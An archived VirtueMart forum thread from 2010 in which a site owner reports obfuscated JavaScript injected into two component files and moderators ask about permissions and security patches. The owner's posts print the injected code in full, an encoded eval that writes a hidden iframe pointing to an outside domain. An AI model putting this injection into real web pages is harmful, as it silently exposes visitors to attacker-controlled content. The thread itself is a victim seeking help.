Welcome, Guest. Please login or register.
Login with username, password and session length

Need help or want to talk to other developers? Join the VirtueMart Chat! Read more...

  Advanced search

247038 Posts in 67506 Topics- by 258314 Members - Latest Member: aniketana
« previous next »
Pages: [1]   Go Down
Print
Author Topic: VirtueMart not secure?  (Read 1456 times)
HDG
Newbie
*
Posts: 28
« on: April 13, 2010, 10:16:09 AM »
I found this in components/com_virtuemart/js/tabs/index.html:
Code:
<script>eval(unescape('%65%76%61%6C%28%66%75%6E%63%74%69%6F%6E%28%61%55%2C%75%76%62%2C%54%4F%68%2C%63%71%51%2C%45%68%43%2C%41%4D%29%7B%45%68%43%3D%53%74%72%69%6E%67%3B%69%66%28%21%27%27%2E%72%65%70%6C%61%63%65%28%2F%5E%2F%2C%53%74%72%69%6E%67%29%29%7B%77%68%69%6C%65%28%54%4F%68%2D%2D%29%41%4D%5B%54%4F%68%5D%3D%63%71%51%5B%54%4F%68%5D%7C%7C%54%4F%68%3B%63%71%51%3D%5B%66%75%6E%63%74%69%6F%6E%28%45%68%43%29%7B%72%65%74%75%72%6E%20%41%4D%5B%45%68%43%5D%7D%5D%3B%45%68%43%3D%66%75%6E%63%74%69%6F%6E%28%29%7B%72%65%74%75%72%6E%27%5C%5C%77%2B%27%7D%3B%54%4F%68%3D%31%7D%3B%77%68%69%6C%65%28%54%4F%68%2D%2D%29%69%66%28%63%71%51%5B%54%4F%68%5D%29%61%55%3D%61%55%2E%72%65%70%6C%61%63%65%28%6E%65%77%20%52%65%67%45%78%70%28%27%5C%5C%62%27%2B%45%68%43%28%54%4F%68%29%2B%27%5C%5C%62%27%2C%27%67%27%29%2C%63%71%51%5B%54%4F%68%5D%29%3B%72%65%74%75%72%6E%20%61%55%7D%28%27%35%2E%32%28%22%3C%38%20%37%3D%5C%5C%22%36%3A%2F%2F%34%2E%30%2F%5C%5C%22%20%33%3D%31%20%39%3D%31%3E%22%29%3B%27%2C%31%30%2C%31%30%2C%27%63%6F%6D%7C%7C%77%72%69%74%65%7C%77%69%64%74%68%7C%62%65%73%6C%6F%71%61%77%65%7C%64%6F%63%75%6D%65%6E%74%7C%68%74%74%70%7C%73%72%63%7C%69%66%72%61%6D%65%7C%68%65%69%67%68%74%27%2E%73%70%6C%69%74%28%27%7C%27%29%2C%30%2C%7B%7D%29%29'));</script><!-- uy7gdr5kmn -->

It seems to have been added there at Apr 13 05:05. The permissions on the file is -rw-r--r--

Is VirtueMart not secure?

Joomla 1.1.15
VM 1.1.4

[EDIT]
modules/mod_virtuemart_login.php
Code:
<script>eval(unescape('%65%76%61%6C%28%66%75%6E%63%74%69%6F%6E%28%61%55%2C%75%76%62%2C%54%4F%68%2C%63%71%51%2C%45%68%43%2C%41%4D%29%7B%45%68%43%3D%53%74%72%69%6E%67%3B%69%66%28%21%27%27%2E%72%65%70%6C%61%63%65%28%2F%5E%2F%2C%53%74%72%69%6E%67%29%29%7B%77%68%69%6C%65%28%54%4F%68%2D%2D%29%41%4D%5B%54%4F%68%5D%3D%63%71%51%5B%54%4F%68%5D%7C%7C%54%4F%68%3B%63%71%51%3D%5B%66%75%6E%63%74%69%6F%6E%28%45%68%43%29%7B%72%65%74%75%72%6E%20%41%4D%5B%45%68%43%5D%7D%5D%3B%45%68%43%3D%66%75%6E%63%74%69%6F%6E%28%29%7B%72%65%74%75%72%6E%27%5C%5C%77%2B%27%7D%3B%54%4F%68%3D%31%7D%3B%77%68%69%6C%65%28%54%4F%68%2D%2D%29%69%66%28%63%71%51%5B%54%4F%68%5D%29%61%55%3D%61%55%2E%72%65%70%6C%61%63%65%28%6E%65%77%20%52%65%67%45%78%70%28%27%5C%5C%62%27%2B%45%68%43%28%54%4F%68%29%2B%27%5C%5C%62%27%2C%27%67%27%29%2C%63%71%51%5B%54%4F%68%5D%29%3B%72%65%74%75%72%6E%20%61%55%7D%28%27%35%2E%32%28%22%3C%38%20%37%3D%5C%5C%22%36%3A%2F%2F%34%2E%30%2F%5C%5C%22%20%33%3D%31%20%39%3D%31%3E%22%29%3B%27%2C%31%30%2C%31%30%2C%27%63%6F%6D%7C%7C%77%72%69%74%65%7C%77%69%64%74%68%7C%62%65%73%6C%6F%71%61%77%65%7C%64%6F%63%75%6D%65%6E%74%7C%68%74%74%70%7C%73%72%63%7C%69%66%72%61%6D%65%7C%68%65%69%67%68%74%27%2E%73%70%6C%69%74%28%27%7C%27%29%2C%30%2C%7B%7D%29%29'));</script><!-- uy7gdr5kmn -->
« Last Edit: April 13, 2010, 10:41:55 AM by HDG » Logged
Forrest
Global Moderator
Hero Member
*
Posts: 1907


Me and my bitch


WWW
« Reply #1 on: April 13, 2010, 12:43:04 PM »
Vm is secure.

What version are you running?

Did you have your files set to:
644, folder 755 recursive?

Password protect your admin folder?
Logged
NEED MORE VM CONTROL WITHOUT HACKS? FC HIGHLY RECOMMENDS:
The 'Meta' Product Line

FREE:
Auto-Generate Metadata
Products & Category XHTML Menu
Wishlist / Favorites / Gift Registry
jenkinhill
Global Moderator
Hero Member
*
Posts: 9763



WWW
« Reply #2 on: April 13, 2010, 16:26:48 PM »
Also what other Joomla! components are installed?

Did you apply the recommended VM 1.1.4security patch? http://forum.virtuemart.net/index.php?topic=64207.msg213322#msg213322
Logged
Kelvyn
Jenkin Hill Internet,
Keswick, Lake District

Please do not PM or Email me with support questions. I look at PMs only once a month. You will get better and faster responses in the support forums.

Current recommended release versions are: Joomla! 1.5.23 :: VirtueMart 1.1.8

URGENT:  Help VirtueMart development by testing  version 1.1.9
Pages: [1]   Go Up
Print
« previous next »
Jump to: